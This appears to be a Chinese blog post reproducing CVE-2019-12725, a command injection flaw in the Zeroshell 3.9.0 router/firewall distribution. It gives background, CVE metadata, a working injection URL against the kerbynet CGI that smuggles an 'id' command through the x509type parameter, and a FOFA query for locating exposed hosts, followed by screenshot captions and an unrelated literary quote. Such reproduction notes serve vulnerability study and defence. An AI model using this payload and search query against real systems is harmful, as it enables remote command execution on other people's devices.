Zeroshell 操作系统命令注入漏洞复现(CVE-2019-12725)

介绍

  • Zeroshell 是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual**、Qos、 DHCP、dns转发等功能,
  • 可以用来安装到服务器上为内网提供网络服务,
  • 而且安装和使用都很方便,有U盘,Live CD和Flash imgage文件用于安装,
  • 可以使用web界面进行设置和管理。想自己部署软路由,又不想编译,找驱动程序,或者别人编译的固件有后门,
  • 可以考虑用Zeroshell替代Openwrt/LEDE。
  • 总的来说Zeroshell的特性包括:
    • 负载均衡及多网络连接的失效转移,通过3G调制解调器的UMTS/HSDPA连接,
    • 用于提供安全认证和无线网络加密密钥自动管理的RADIUS服务器,
    • 用于支持网页登录的强制网络门户(商场和酒店等商用场景),以及很多其他内容。

漏洞编号

  • 发布时间:2019-07-19
  • 更新时间:2019-07-23
  • CVE编号:CVE-2019-12725
  • CNNVD-ID:CNNVD-201907-1141

漏洞描述

  • Zeroshell是一套面向服务器和嵌入式系统的Linux发行版。
  • 该漏洞源于程序没有正确处理HTTP参数。
  • 攻击者可通过注入操作系统命令利用该漏洞执行命令。
  • type=%27%0Aid%0A%27
    /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=%s&x509type=%27%0Aid%0A%27
    

影响版本

  • Zeroshell 3.9.0版本中存在安全漏洞

fofa

app="Zeroshell-防火墙"

漏洞复现

Zeroshell 操作系统命令注入漏洞复现(CVE-2019-12725)_第1张图片
Zeroshell 操作系统命令注入漏洞复现(CVE-2019-12725)_第2张图片
在这里插入图片描述

Zeroshell 操作系统命令注入漏洞复现(CVE-2019-12725)_第3张图片

摘抄


遗憾像什么?

像身上一颗小小的痣,

只有自己才知道位置及浮现的过程。

– 简媜 《烟波蓝》


你可能感兴趣的:(漏洞复现)